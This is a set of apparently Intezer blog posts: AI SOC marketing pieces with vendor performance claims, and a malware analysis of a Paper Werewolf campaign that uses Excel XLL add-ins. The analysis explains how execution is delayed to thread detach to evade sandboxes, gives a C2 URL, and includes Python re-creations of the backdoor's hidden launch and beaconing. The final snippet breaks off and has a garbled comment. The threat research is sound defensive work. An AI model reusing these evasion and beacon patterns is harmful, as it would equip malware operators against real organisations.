
Alert fatigue is costing you: Why your SOC misses 1% of real threats

Introducing the 2026 Intezer AI SOC Report for CISOs

For years, security leaders have lived with an uncomfortable truth: it has simply been impossible to investigate every alert. As alert volumes exploded and teams failed to scale, SOCs, whether in-house or outsourced, normalized “acceptable risk” by deprioritizing low-severity and informational alerts.

Our latest research shows that this approach is no longer defensible.

Intezer has just released the 2026 AI SOC Report for CISOs, based on the forensic analysis of more than 25 million security alerts across live enterprise environments. The findings reveal a critical disconnect between how security teams prioritize alerts and where real threats actually originate, and the cost of that gap is far higher than most organizations realize.

Why “acceptable risk” is no longer acceptable 

Across endpoint, cloud, identity, network, and phishing telemetry, Intezer found that nearly 1% of confirmed incidents originated from alerts initially labeled as low-severity or informational. On endpoints, that figure climbed to nearly 2%.

At enterprise scale, that percentage is not noise.

For a typical organization generating roughly 450,000 alerts per year, this translates to ~50 real threats annually, about one per week, never investigated by a SOC or MDR team. These are not theoretical risks. They are real compromises hiding in plain sight, dismissed not because they were benign, but because teams lacked the capacity to look.
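As a back-of-the-envelope check, the scale of the gap is easy to reproduce using only the two figures above (both from the report):

```python
alerts_per_year = 450_000   # typical enterprise alert volume, per the report
missed_threats = 50         # real threats surfacing from deprioritized alerts, per the report

# Roughly one genuine threat hides in every ~9,000 alerts that triage rules skip.
print(f"1 missed threat per {alerts_per_year // missed_threats:,} alerts")

# About one uninvestigated compromise per week.
print(f"{missed_threats / 52:.1f} missed threats per week")
```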

What the data revealed across the attack surface

Because Intezer AI SOC investigates 100% of alerts using forensic-grade analysis, the report exposes how attackers actually operate once you remove triage bias from the equation.

Endpoint security is more fragile than reported

More than half of endpoint alerts were not automatically mitigated by endpoint protection tools. Of those, nearly 9% were confirmed malicious. Even more concerning, 1.6% of endpoints undergoing live forensic scans were still actively compromised despite being reported as “mitigated” by EDR tools.

See the full endpoint threat data → Download the 2026 AI SOC Report

Low-severity does not mean low-risk

Within endpoint alerts alone, 1.9% of low-severity and informational alerts were real incidents, the exact alerts most SOCs never review.

Attackers favor stealth over noise

Cloud telemetry was dominated by defense evasion and persistence techniques, reflecting a shift toward long-term access, token abuse, and misuse of legitimate services rather than overt exploitation.

Phishing has moved into trusted platforms and browsers

Fewer than 6% of malicious phishing emails contained attachments. Most relied on links, language, and abuse of legitimate services such as cloud file sharing, code sandboxes, and CAPTCHA mechanisms, where traditional controls have limited visibility.

Cloud misconfigurations persist as silent risk multipliers

Most cloud posture findings stemmed from legacy or default configurations, especially in Amazon S3, including missing encryption, weak access controls, and lack of logging—issues often classified as “low severity,” yet repeatedly exploited once attackers gain a foothold.

To read the full report and all the findings, download the CISO’s guide to AI SOC 2026 here.

Why traditional SOCs fail: capacity, fragmentation and judging alerts by their severity

Modern SOC failures are rarely the result of a single broken tool or negligent team. They are the outcome of structural tradeoffs that every traditional SOC—internal or MDR—has been forced to make.

Capacity is the first constraint.
Human analysts do not scale linearly with alert volume. As telemetry expands across endpoint, cloud, identity, network, and SaaS, SOCs hit a hard ceiling. The only way to cope is aggressive triage: close most alerts automatically, investigate only what looks “important,” and hope severity labels align with reality. The 2026 AI SOC Report shows that this assumption is false at scale.

Tool fragmentation compounds the problem.
Most SOC stacks are collections of siloed detections, EDR, SIEM, identity, cloud posture, email, each optimized for a narrow signal. Severity is assigned locally, without cross-surface context or forensic validation. As a result, alerts are scored based on abstract rules, not evidence of compromise. When SOCs trust these labels blindly, they inherit the tools’ blind spots.

Process tradeoffs lock risk in place.
Once triage rules are defined, they become institutionalized. Low-severity alerts are ignored by design. MDR providers codify this into SLAs. Internal SOCs bake it into runbooks. Crucially, there is no closed-loop feedback: missed threats do not automatically improve detections, because they were never investigated in the first place.

The outcome is not an occasional failure. It is systematic, repeatable risk, embedded directly into how SOCs operate.

Real-world examples of missed threats hiding in plain sight

The data in the 2026 AI SOC Report makes clear that missed threats are not exotic edge cases. They are ordinary attacks progressing quietly through environments because no one looked.

Endpoints marked “mitigated” but still compromised
In over 1.6% of live forensic endpoint scans, Intezer found active malicious code running in memory even though the EDR had already reported the threat as resolved. These cases included stealers, RATs, and post-exploitation frameworks, often originating from low-severity alerts that never triggered deeper inspection. Without memory-level forensics, these compromises would have remained invisible.

Phishing hosted on trusted platforms
Attackers increasingly host phishing pages on legitimate developer platforms like Vercel and CodePen, or abuse trusted cloud services such as OneDrive and PayPal. The parent domains appear reputable, so alerts are downgraded or ignored. Yet behind them are live credential-harvesting pages that bypass email gateways and browser-based defenses alike.

Cloud misconfigurations as delayed breach accelerators
Many cloud posture findings, such as unencrypted S3 buckets, missing access logs, and permissive cross-account policies, rarely trigger action. But once an attacker gains any foothold, these long-standing misconfigurations dramatically accelerate lateral movement, persistence, and data exposure.

In every case, the failure was not detection. The signal existed. The failure was investigation.

How attackers deliberately exploit SOC blind spots

Attackers understand SOC economics better than most defenders.

They know which alerts generate fatigue.
They know which detections are noisy.
They know which categories are deprioritized by default.

As a result, modern attackers design their campaigns to blend into the backlog, not trigger alarms.

Stealth over speed
Cloud intrusions favor defense evasion, persistence, and token abuse over loud exploitation. These behaviors generate alerts, but rarely high-severity ones. The report shows cloud telemetry dominated by exactly these tactics, indicating attackers are optimizing for long-term access rather than immediate impact.

Living off trusted infrastructure
Phishing campaigns increasingly abuse legitimate brands, file-sharing services, CAPTCHA frameworks, and developer platforms. These environments inherit trust by default, allowing attackers to operate under severity thresholds that SOCs routinely ignore.

Multi-stage loaders and memory-only execution
On endpoints, attackers rely on layered loaders, in-memory payloads, and obfuscation techniques that evade static detections. Initial alerts may look benign or incomplete. Without forensic follow-through, SOCs miss the actual compromise entirely.

Attackers are not evading detection systems alone; rather, they are exploiting SOC decision-making models.

What this means for your SOC operations

For CISOs and SOC leaders, the implication is stark:
Risk is no longer defined by what you detect, but by what you choose not to investigate.

If your SOC:

  • Ignores low-severity alerts by default
  • Relies on severity labels without forensic validation
  • Limits investigations based on human capacity
  • Operates without a feedback loop between outcomes and detections

Then missed threats are not anomalies; they are guaranteed.

The organizations that will reduce risk in 2026 are not adding more dashboards or rewriting triage rules. They are adopting operating models where investigation is no longer a scarce resource.

This is why AI-driven, forensic-grade SOC platforms fundamentally change the equation. When every alert is investigated:

  • Severity becomes evidence-based, not assumed
  • Detection quality improves through real-world validation
  • Attackers lose the ability to hide in “acceptable risk”
  • SOC teams regain control without scaling headcount

This is the shift behind the Intezer AI SOC model and why the concept of acceptable risk must be redefined for the modern threat landscape.

This all changes when you can investigate everything

The data in the 2026 AI SOC Report points to a different reality, one where AI-driven forensic analysis removes investigation capacity as a constraint.

When every alert is investigated:

  • “Low severity” stops being a proxy for “safe”
  • Detection quality improves through real-world validation
  • Missed threats drop from dozens per year to near zero
  • Escalations fall below 2%, without sacrificing coverage
  • Risk tolerance is defined by evidence, not exhaustion

This is the operating model behind Intezer AI SOC, powered by ForensicAI™, and it is why the definition of acceptable risk must be reset.

Download the report and join the discussion

The 2026 AI SOC Report for CISOs is grounded in:

  • 25 million alerts analyzed
  • 10 million monitored endpoints and identities
  • 82,000 forensic endpoint investigations, including live memory scans
  • Telemetry from 7 million IP addresses, 3 million domains and URLs, and over 550,000 phishing emails

All data was aggregated and anonymized across Intezer’s global enterprise customer base.

👉 Download the full report to explore the findings in detail, and
👉 Join Intezer’s research team on Wednesday, February 4th at 12 p.m. ET for a live webinar breaking down what this data means for SOC leaders and CISOs.

Because in 2026, the biggest risk is no longer what you detect, it’s what you choose not to investigate.

The post Alert fatigue is costing you: Why your SOC misses 1% of real threats appeared first on Intezer.


How AI brings the OSCAR methodology to life in the SOC

When I look back on my years as a SOC lead in MDR, the thing I remember most clearly is the tension between wanting to do things the “right way” and simply trying to survive the day.

The alert queue never stopped growing. The attack surface kept expanding into cloud, identity, SaaS, and whatever new platform the business adopted. And every shift ended with the same uneasy feeling: What did we miss because there wasn’t enough time to investigate everything fully?

While different sources emphasize different challenges, recent statistics from late 2024 and 2025 reports reflect exactly what so many SOC analysts and leads feel:

  • The majority of alerts are never touched. Recent surveys indicate that 62% of alerts are ignored largely because the sheer volume makes them impossible to address. Furthermore, many analysts report being unable to deal with up to 67% of the daily alerts they receive.
  • The volume is unmanageable for humans. A typical SOC now processes an average of 3,832 alerts per day. For analysts trying to manually triage this flood, the math simply doesn’t add up.
  • Burnout is the new normal. The pressure is unsustainable, with 71% of SOC analysts reporting burnout due to alert fatigue. This has accelerated turnover, with some SOCs seeing analyst retention cycles shrink to less than 18 months, eroding institutional knowledge.

When people outside the SOC see these numbers, they assume analysts aren’t doing their jobs. The truth is the opposite. Most analysts are doing the best work they can inside a system that was never built for volume. Traditional triage is reactive and heavily dependent on intuition. On a good day, that might work. On a bad day, it leads to inconsistent decisions, coverage gaps, and immense pressure on analysts who care deeply about getting it right.

This is where the OSCAR methodology becomes valuable again.

Why the OSCAR methodology still matters

As a SOC lead, I always wanted the team to approach alerts with organizational structure. OSCAR provides that structure by creating a clear, repeatable sequence (sketched in code just after this list):

  • Obtain Information
  • Strategize
  • Collect Evidence
  • Analyze
  • Report
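To make the sequence concrete, here is a minimal sketch of OSCAR as a pipeline. This is illustrative Python only; the stage functions are hypothetical placeholders standing in for real tooling, not Intezer APIs:

```python
from dataclasses import dataclass, field

# Hypothetical stage functions; real implementations would query your actual tooling.
def obtain_information(alert_id):
    return {"alert_id": alert_id, "host": "unknown"}

def strategize(context):
    return ["check process tree", "check network egress"]

def collect_evidence(plan):
    return {step: "collected" for step in plan}

def analyze(evidence):
    return "benign" if evidence else "undetermined"

@dataclass
class Case:
    alert_id: str
    context: dict = field(default_factory=dict)   # O: Obtain Information
    plan: list = field(default_factory=list)      # S: Strategize
    evidence: dict = field(default_factory=dict)  # C: Collect Evidence
    verdict: str = "undetermined"                 # A: Analyze

def oscar(alert_id: str) -> str:
    case = Case(alert_id)
    case.context = obtain_information(case.alert_id)
    case.plan = strategize(case.context)
    case.evidence = collect_evidence(case.plan)
    case.verdict = analyze(case.evidence)
    return f"{case.alert_id}: {case.verdict} via {case.plan}"  # R: Report
```

The point of the structure is that every alert takes the same path; the bottleneck is that each stage costs human time.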

It removes guesswork and helps analysts who are still developing their skills stay grounded during chaotic shifts. But here is the reality I learned firsthand: you can only scale OSCAR so far with humans alone.

Evidence collection takes time. Deep analysis takes more time. No matter how motivated an analyst is, there are simply not enough hours in a shift to apply OSCAR to every alert manually. Most teams end up applying the methodology selectively; critical and high-severity alerts get the full OSCAR treatment, while everything else gets whatever time is left.

That gap between process and reality is exactly where Intezer enters the picture.

How Intezer operationalizes OSCAR at scale

Intezer takes the proven structure of OSCAR and executes it automatically and consistently across every alert. Instead of relying on how much energy an analyst has left 45 minutes before their shift ends, Intezer performs evidence collection, deep forensic analysis, and reporting at a speed and depth no human team could sustain.

Here is how the platform automates the methodology step-by-step:

O: Information obtained

In my SOC days, gathering context meant jumping between consoles and browser tabs, hoping nothing crashed. Intezer collects all of this instantly from endpoints, cloud platforms, identity systems, and threat intel sources. Analysts start every case with the full picture rather than a partial one.

S: Strategy suggested

Instead of relying on an analyst’s instinct about what might be happening, the Intezer platform generates verdicts and risk-based priorities immediately (with 98% accuracy). This provides critical consistency, especially for junior analysts who are still finding their confidence. Additionally, all AI reasoning is fully backed by deterministic, evidence-based analysis.

C: Evidence collected

This was always the slowest part of manual investigation. Intezer collects memory artifacts, files, process information, and cloud activity in seconds. No hunting, no guessing, and no hoping you pulled the right logs before they rolled over.

A: Analysis (forensic-grade)

Intezer performs genetic code analysis, behavioral analysis, static/dynamic analysis, and threat intelligence correlation on every single alert. This is the level of scrutiny senior analysts wish they had time to do manually, but usually can only afford for the most critical incidents.

Read more about how Intezer Forensic AI SOC operates under the hood.

R: Reporting & transparency

The platform creates clear, structured audit trails. This removes the burden of manual documentation from analysts and ensures that the “why” behind every decision is transparent and explainable.

The result: Moving beyond “speed vs. depth”

When OSCAR is coupled with Intezer’s AI Forensic SOC, the operation transforms. We see this in actual customer environments:

  • 100% alert coverage: Even low-severity and “noisy” alerts are fully triaged.
  • Sub-minute triage: Drastically improved MTTR/MTTD and minimized backlogs.
  • 98% accurate decisioning: Verdicts are supported by deterministic evidence, reducing escalations for human review to less than 4%.

The shift in operations:

Capability | Traditional MDR SOC | Intezer Forensic AI SOC
Coverage | Critical and high-severity alerts | 100% of alerts
Triage time | 20+ mins per alert | <2 mins (automated)
Analyst mode | Data collector | Investigator

From the perspective of a former SOC lead, the most important benefit is this: 

“Analysts finally get to think again. Automation handles the busy work. Humans get to use judgment, creativity, and experience.”

Final thoughts

For years, triage has been treated like a speed exercise. But the threats we face today require depth, context, and clarity. OSCAR gives SOCs the investigative structure they need, and Intezer provides the scale required to actually use that structure across every alert.

For the first time, teams don’t have to choose between speed and depth. They get both.

If your SOC wants to move from reactive to truly investigative operations, we would be happy to show you what an OSCAR-driven Intezer SOC looks like in practice.

The post How AI brings the OSCAR methodology to life in the SOC appeared first on Intezer.


Building effective AI for the SOC: How Intezer Forensic AI SOC follows Anthropic’s best practices

One of the most influential publications on real-world AI system design is Anthropic’s guide, Building Effective Agents. Its core message is simple:
Effective AI requires structure first, adaptability second.

Anthropic emphasizes that AI agents work best when:

  1. A deterministic workflow does all the structured work up front
  2. The agent only activates when uncertainty remains
  3. The agent begins with full context, not an empty slate
  4. Tool usage is controlled and evidence-driven
  5. Human-in-the-loop remains central for oversight and trust

These principles ensure accuracy, avoid hallucinations, and keep investigations reproducible, all of which are critical requirements for cybersecurity.

Intezer Forensic AI SOC is built on exactly this philosophy. Our platform uses a dual-mode design with Intezer AI Workflow and AI Agent, completely aligning with Anthropic’s best practices to deliver fast, scalable and highly accurate investigations across a broad range of alerts, all while keeping analysts in the loop.

Here is how Intezer implements Anthropic’s best practices for agents.

Structured first: Intezer AI Workflow handles the majority of alerts

Anthropic advises that AI systems should begin with deterministic workflows instead of free-form reasoning. In cybersecurity, this is essential for accuracy, auditability, trust and scalability (when handling huge volumes of alerts).

Intezer’s AI Workflow mode is a structured triage process designed by security experts and executed with strict consistency. It applies AI only at key decision points, not as the driver of the entire investigation.

This approach provides:

  • Deterministic, reproducible results
  • High speed due to streamlined, parallelizable steps
  • Lower costs because heavy reasoning is used sparingly
  • No drift or unexpected branching
  • Clear human oversight points

Most alerts, especially well-defined ones, are fully resolved at this stage, giving SOCs broad alert coverage at low cost.

Adaptive only when needed: Intezer AI Agent extends the investigation

Anthropic states that agents should activate only when the structured workflow reaches uncertainty, and only after they inherit the full context. Intezer follows this exactly.

AI Agent mode activates only when the Workflow cannot reach a high-confidence verdict.

At that point, the agent:

  • Starts with all evidence collected so far
  • Avoids premature assumptions
  • Uses tools deliberately and contextually
  • Expands the investigation where human analysts would
  • Surfaces deeper behavioral patterns or cross-asset correlations

This ensures the agent is guided, not free-floating, and its decisions remain grounded in evidence, not guesswork.
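The gating logic is easy to picture in code. Below is a minimal sketch of the pattern described above, with hypothetical function names and an assumed confidence threshold; it is not Intezer’s actual implementation. The deterministic workflow runs first, and the agent activates only when confidence is insufficient, inheriting the full evidence set:

```python
CONFIDENCE_THRESHOLD = 0.9  # assumed cutoff for a workflow-only verdict

def run_structured_workflow(alert: dict) -> dict:
    # Placeholder: a real workflow executes predefined, reproducible triage steps.
    return {"verdict": "benign", "confidence": 0.95, "evidence": {"alert": alert}}

def run_agent(context: dict, tools: list) -> dict:
    # Placeholder: a real agent reasons over the inherited evidence and picks tools.
    return {"verdict": "malicious", "confidence": 0.92, "tools_used": tools}

def investigate(alert: dict) -> dict:
    # 1. Structured first: the deterministic workflow handles the alert end to end.
    result = run_structured_workflow(alert)
    if result["confidence"] >= CONFIDENCE_THRESHOLD:
        return {"verdict": result["verdict"], "path": "workflow"}

    # 2. Adaptive only when needed: the agent starts with full context, not an empty slate.
    agent = run_agent(context=result["evidence"],
                      tools=["siem_query", "edr_lookup", "code_dna"])

    # 3. Human-in-the-loop: anything still uncertain is escalated for analyst review.
    if agent["confidence"] < CONFIDENCE_THRESHOLD:
        return {"verdict": "escalate_to_analyst", "path": "agent+human"}
    return {"verdict": agent["verdict"], "path": "agent"}
```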

Tools the AI Agent can leverage once activated

  • Dynamic SIEM queries
  • EDR/XDR telemetry lookups
  • Identity provider (IDP) investigation
  • Behavioral analysis of processes and command lines
  • User activity mapping
  • Process ancestry and parent-child correlation
  • Intezer’s historical alert database
  • Code DNA similarity and malware lineage tracking
  • Additional host, memory, or file-based forensics

The result is deeper investigation where it matters, without unnecessary cost.

Human-in-the-loop by design

Intezer keeps human analysts at the center so they can review and override conclusions, and trace every decision made by Intezer. Of course, all evidence and reasoning is grounded in forensic data and is fully transparent and explainable for beginners and advanced analysts alike.

This aligns with Anthropic’s principle that humans remain final decision-makers, especially in high-stakes domains like cybersecurity.

How this architecture improves SOC performance

Intezer’s adherence to Anthropic’s best practices produces measurable outcomes across the three most important SOC metrics: accuracy, coverage, and speed, while also reducing cost.

Accuracy

Intezer’s approach combines deterministic forensics with adaptive AI to deliver best-in-class verdict quality.

  • The structured workflow prevents hallucinations
  • The AI Agent only activates with strong guardrails
  • Context inheritance ensures consistent reasoning
  • Analysts always have visibility and control

This hybrid approach dramatically reduces false positives and prevents premature conclusions.

Triage of all alerts, including low-severity (where threats often hide)

Because AI Workflows handle the bulk of alerts inexpensively and AI Agents only run when needed, heavy and expensive reasoning calls are minimized.

This frees SOCs from cherry-picking which alerts to ingest, allowing them to triage and investigate all of them.

This is crucial for:

  • High-volume enterprise environments
  • MSSPs with strict SLAs
  • Cloud-scale detection pipelines
  • 24/7 monitoring teams

You get broad alert coverage without inflating compute costs.

Speed: Structured steps + adaptive depth

  • Workflow mode resolves most alerts within seconds
  • Agents accelerate investigations that normally take analysts hours
  • No bottlenecks, no backlog, no manual evidence gathering

The result is a SOC where every alert is investigated quickly, consistently, and with forensic depth.

Table of how Intezer’s design reflects Anthropic’s guidance

Anthropic best practice | How Intezer implements it
Start with deterministic workflows | AI Workflow handles structured triage with predefined expert steps
Activate agents only when needed | AI Agent triggers only when confidence is insufficient
Give agents full context | Agent inherits the entire Workflow evidence set
Control tool usage | Agent selects tools based on evidence, not speculation
Maintain human-in-the-loop | Analysts can verify, guide, and override conclusions
Prioritize safety and reproducibility | Every action is logged, justified, and traceable

Conclusion: Anthropic’s Agent principles in a real SOC

Anthropic’s framework for building effective agents is now influencing industries far beyond general AI research. Intezer Forensic AI SOC might be one of the strongest real-world implementations of these practices in cybersecurity.

By combining:

  • Deterministic workflows for reliable baseline investigations
  • Adaptive agents for deeper reasoning when needed
  • Human oversight for trust and accountability
  • Cost efficiency enabling full-pipeline alert coverage

Intezer is able to deliver fast, accurate, and scalable triage that transforms SOC operations.

Learn more about how you can transform your SOC today.

The post Building effective AI for the SOC: How Intezer Forensic AI SOC follows Anthropic’s best practices appeared first on Intezer.


The 7 CISO requirements for AI SOC in 2026

I recently participated in a security leader roundtable hosted by Cybersecurity Tribe. During this session, I got to hear firsthand from security leaders at major organizations including BNP Paribas, the NFL, ION Group, and half a dozen other global enterprises.

Across industries and maturity levels, their priorities were remarkably consistent. When it comes to AI-powered SOC platforms, these are the seven capabilities every CISO is asking for.

1. Trust and traceability

If there was one theme that came up more than anything else, it was trust. Security leaders don’t want “mysterious” AI. They want transparency.

They repeatedly insisted that AI outputs must be auditable, explainable, and reproducible.
They need to be able to show the work: for compliance auditors, for internal governance boards, and increasingly to address emerging legal and regulatory risk.

Black-box decisions won’t cut it. AI must generate evidence, not just conclusions.

2. Reduction of alert fatigue (operational efficiency)

Every leader I spoke with is wrestling with alert overload. Even mature SOCs are drowning in low-value notifications and pseudo-incidents.

A measurable reduction in alerts escalated to humans is now a top KPI for evaluating AI platforms. Leaders want an environment where analysts spend their time on exploitable, high-impact threats, not noise.

If AI can remove repetitive triage work, that’s not just helpful; it’s transformational.

3. Contextual, risk-based prioritization (beyond CVSS)

No one wants yet another dashboard that nags them about high CVSS scores on systems nobody actually cares about.

CISOs want AI that can fuse:

  • Telemetry
  • Vulnerability data
  • Identity information
  • Business context (asset criticality, job role, data sensitivity, process impact)

The goal is prioritization that reflects real organizational risk, not arbitrary severity scores.

They want AI to tell them: “This is the one alert that actually matters today, and here’s why.”
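One way to picture prioritization “beyond CVSS” is to weight each alert’s technical severity by business context. The weights and fields below are invented for illustration; real platforms would derive them from telemetry, identity, and asset data:

```python
def business_risk(alert: dict) -> float:
    """Blend technical severity with business context (illustrative weights only)."""
    base = alert["cvss"] / 10                       # normalized technical severity
    asset = {"crown_jewel": 1.0, "standard": 0.5, "lab": 0.1}[alert["asset_tier"]]
    identity = 1.0 if alert["privileged_user"] else 0.4
    exposure = 1.0 if alert["internet_facing"] else 0.6
    return round(base * asset * identity * exposure, 3)

alerts = [
    {"id": "A1", "cvss": 9.8, "asset_tier": "lab",
     "privileged_user": False, "internet_facing": False},
    {"id": "A2", "cvss": 6.5, "asset_tier": "crown_jewel",
     "privileged_user": True, "internet_facing": True},
]

# The "critical" CVSS on a lab box ranks below a medium CVSS on a crown-jewel asset.
for a in sorted(alerts, key=business_risk, reverse=True):
    print(a["id"], business_risk(a))
```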

Get your editable copy of the one deck you need to pitch your board for 2026 AI SOC budget.

4. Safe automation with human-in-the-loop for high-impact actions

Most leaders are open to selective autonomous remediation, but only in narrow, well-defined, high-confidence scenarios.

For example:

  • Rapid ransomware containment
  • Isolation of clearly compromised endpoints
  • Automatic execution of repeatable hygiene tasks

But for broader or higher-impact actions, CISOs still want human review. The tone was clear:
AI should move fast where appropriate, but never at the expense of control.

5. Integration and practical telemetry coverage

Every leader emphasized that an AI platform is only as good as the data it can consume.

The must-have list included:

  • Cloud telemetry (AWS, Azure, GCP)
  • Identity providers (Okta, Entra ID, Ping)
  • EDR/XDR
  • SIEM logs
  • Ticketing/ITSM
  • Custom threat intelligence feeds

They don’t want a magical AI that promises answers without good data.
They want a connected system that can see across the entire environment.

6. Executive & board alignment with demonstrable ROI

CISOs aren’t implementing AI in a vacuum. Their boards and executive leadership teams are pressuring them from two very different angles:

  • Some are mandating AI adoption as a strategic priority.
  • Others are slowing everything down with extensive governance, risk, and compliance processes.

To navigate this dynamic, CISOs need clear, defensible ROI:

  • Reduced operating costs
  • Faster mean-time-to-respond
  • Fewer escalations
  • More predictable outcomes

AI without measurable value is no longer acceptable.
They need something they can put in front of the board and say, “Here’s the impact.”

7. Accountability and legal clarity

Before enterprises allow AI to autonomously take security actions, CISOs need a fundamental question answered:

“Who is accountable when the AI acts?”

This isn’t just a theoretical concern. It’s a gating requirement for adoption.

Until there is clear guidance on liability, responsibility, and governance, many organizations will keep AI on a tight leash.

Closing thoughts

Across all of these conversations, the message was consistent:
AI in the SOC is inevitable, but it must be safe, transparent, integrated, and measurable.

CISOs aren’t looking for science fiction. They’re looking for credible, operational AI that enhances their teams, strengthens their defenses, and aligns with business realities.

Read about why the best LLMs are not enough for the AI SOC.

The post The 7 CISO requirements for AI SOC in 2026 appeared first on Intezer.


Tracing a Paper Werewolf campaign through AI-generated decoys and Excel XLLs

An XLL is a native Windows DLL that Excel loads as an add-in, allowing it to execute arbitrary code through exported functions like xlAutoOpen. Threat actors have abused Microsoft Excel add-ins in the .XLL format since at least mid-2017; the earliest documented misuse is by the threat group APT10 (aka Stone Panda / Potassium), which injected backdoor payloads via XLLs.

Since 2021, a growing number of commodity malware families and cyber-crime actors have added XLL-based delivery to their arsenals. Notable examples include Agent Tesla and Dridex; researchers observed an increase in these families being dropped via malicious XLL add-ins.

Attackers typically embed their malicious code in the standard add-in export functions, such as xlAutoOpen. When a user enables the add-in in Excel, the code executes automatically, dropping or downloading a malicious payload. Some malware families use legitimate frameworks to create XLL (Excel add-in) files. One common example is Excel-DNA, a popular open-source framework.

These frameworks make it easier for attackers to build and load malicious XLLs. In some cases, they also allow threat actors to pack and execute additional payloads directly in memory.

In late October 2025, a 64-bit DLL compiled as an XLL add-in was submitted to VirusTotal from two different countries. The first submission came from Ukraine on October 26, followed by three separate submissions from Russia beginning on October 27. The Russian-submitted samples were named Плановые цели противника.xll (“enemy’s planned targets”) and Плановые цели противника НЕ ЗАПУСКАТЬ.xll, which depending on context can mean either “Do NOT release the enemy’s planned targets” or “Do NOT activate the enemy’s scheduled targets.”

This DLL contains an embedded second-stage payload, a backdoor we named EchoGather. Once launched, the backdoor collects system information, communicates with a hardcoded command-and-control (C2) server, and supports command execution and file transfer operations. While it uses the XLL format for delivery, its execution chain and payload behavior differ from previously documented threats abusing Excel add-ins. Through pivoting on infrastructure and TTPs we were able to link this campaign to Paper Werewolf (aka GOFFEE), a group that has been targeting Russian organizations.

Explore how Intezer Forensic AI SOC eliminates alert noise so you can focus on real threats.

Technical analysis

Let’s dive deeper.

What is an XLL?

An XLL is an Excel add-in implemented as a DLL that Excel loads directly, usually with the .xll extension. Microsoft explicitly describes XLL files as a DLL-style add-in that extends Excel with custom functions. 

When a user double-clicks a file with the .xll extension, Excel is launched, loads the DLL, and calls its exported functions, such as xlAutoOpen on initialization or xlAutoClose when unloading. Malicious XLLs often embed their payload inside xlAutoOpen or a secondary loader, so that code runs immediately once Excel imports the DLL.

Excel XLL add-ins and macros differ mainly in how they execute and the level of control they provide an attacker. Macros, whether VBA or legacy XLM, run as scripts inside Excel’s macro engine and are constrained by Microsoft’s security model, which now includes blocking macros from the internet, signature requirements, and multiple user-facing warnings. XLLs, on the other hand, are compiled DLLs that Excel loads directly into its own process using LoadLibrary(), giving them the full power of native code without going through macro security checks. While macros rely on interpreted scripting and COM interactions, XLLs can call any Windows API, inject into other processes, or act as full-featured malware loaders. This makes XLLs far more capable and harder to analyze, and it may explain why some threat actors choose XLL-based delivery methods over macro-based ones.
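Because an XLL is just a DLL with well-known exports, one quick way to flag XLL candidates during analysis is to inspect the export table. A minimal sketch using the third-party pefile library (the file path is a placeholder):

```python
import pefile  # pip install pefile

# Standard Excel add-in entry points an XLL is expected to export.
XLL_EXPORTS = {b"xlAutoOpen", b"xlAutoClose", b"xlAutoFree", b"xlAddInManagerInfo"}

pe = pefile.PE("sample.xll")  # placeholder path to the DLL under analysis
exports = set()
if hasattr(pe, "DIRECTORY_ENTRY_EXPORT"):
    exports = {sym.name for sym in pe.DIRECTORY_ENTRY_EXPORT.symbols if sym.name}

hits = exports & XLL_EXPORTS
if hits:
    print("Excel add-in exports found:", sorted(hits))
```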

Loader behavior

The DLL exports two functions, xlAutoOpen and xlAutoClose, both of which return zero. This behavior differs from that of legitimate XLL add-ins as well as from previously documented threats abusing the XLL format, such as those described in the most recent CERT-UA publication. In this case, the malicious logic is not tied to the typical export functions but is instead triggered through DllMain. The loader’s main function is called when fdwReason > 2, meaning that dllmain_dispatch was called with DLL_THREAD_DETACH (= 3). Essentially, the main function will be called when any thread in Excel that previously called into the XLL (even Excel’s own threads) exits.

Triggering the malicious payload during DLL_THREAD_DETACH helps the malware evade detection by delaying execution until a thread exits. This bypasses typical behavior-based detection, which focuses on early-stage activity like PROCESS_ATTACH, making the execution appear benign at first and allowing the second-stage payload to activate covertly after the sandbox times out or AV heuristics complete.

SHA-256: 0506a6fcee0d4bf731f1825484582180978995a8f9b84fc59b6e631f720915da

A call to the function that loads and executes the backdoor.

The embedded file is dropped as mswp.exe in %APPDATA%\Microsoft\Windows, then executed as a hidden process using CreateProcessW with CREATE_NO_WINDOW. Standard output and error are captured and redirected via anonymous pipes. If process creation succeeds, the function returns true; otherwise, it cleans up and returns false.
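For readers reproducing this behavior in a lab, the loader’s process-creation pattern maps closely onto Python’s subprocess module. A Windows-only sketch (the dropped path is taken from the analysis above):

```python
import os
import subprocess

# Path where the loader drops its payload, per the analysis above.
payload = os.path.expandvars(r"%APPDATA%\Microsoft\Windows\mswp.exe")

proc = subprocess.Popen(
    [payload],
    creationflags=subprocess.CREATE_NO_WINDOW,  # hidden window, like CREATE_NO_WINDOW in CreateProcessW
    stdout=subprocess.PIPE,                     # anonymous pipes capture the child's
    stderr=subprocess.PIPE,                     # stdout and stderr, as the loader does
)
out, err = proc.communicate()
```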

The backdoor: EchoGather

We refer to this backdoor as EchoGather due to its focus on system reconnaissance and repeated beaconing behavior. 

SHA-256: 74fab6adc77307ef9767e710d97c885352763e68518b2109d860bb45e9d0a8eb

The dropped payload is a 64-bit backdoor with hardcoded configuration and C2 address. It collects system information and communicates with the C2 over HTTP(S) using the WinHTTP API.

Main function of EchoGather.

The data collected by EchoGather consists of:

  • IPv4 addresses
  • OS type (“Windows”)
  • Architecture
  • NetBIOS name
  • Username
  • Workstation domain
  • Process ID
  • Executable path
  • Static version string: 1.1.1.1

Next, EchoGather encodes that data using Base64 and sends it to the C2 using POST method. The C2 address is constructed from hardcoded strings. In the analyzed sample the C2 address was: https://fast-eda[.]my:443/dostavka/lavka/kategorii/zakuski/sushi/sety/skidki/regiony/msk/birylievo
This transmission occurs in an infinite loop with randomized sleep intervals between 300–360 seconds.

In all of its C2 communications, EchoGather uses the WinHTTP API. It supports various proxy configurations and is designed to ignore SSL/TLS certificate validation errors, allowing it to operate in environments with custom or misconfigured proxy and certificate settings.
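Putting the beaconing behavior together, here is a simplified re-implementation for illustration (useful when building detections or sandbox emulators). The URL, field values, and serialization format are assumptions; the real sample hardcodes its own C2 path, uses WinHTTP, and omits is not shown here beyond comments:

```python
import base64
import json
import random
import time
import urllib.request

C2_URL = "https://example.invalid/beacon"  # placeholder; the sample hardcodes its own URL

def host_profile() -> dict:
    # The fields EchoGather collects; values are stubbed for illustration.
    return {
        "ips": ["10.0.0.5"], "os": "Windows", "arch": "x64",
        "netbios": "HOST01", "user": "analyst", "domain": "WORKGROUP",
        "pid": 1234, "exe": r"C:\path\to\mswp.exe", "version": "1.1.1.1",
    }

while True:
    # Serialize (format assumed), Base64-encode, and POST to the C2.
    body = base64.b64encode(json.dumps(host_profile()).encode())
    req = urllib.request.Request(C2_URL, data=body, method="POST")
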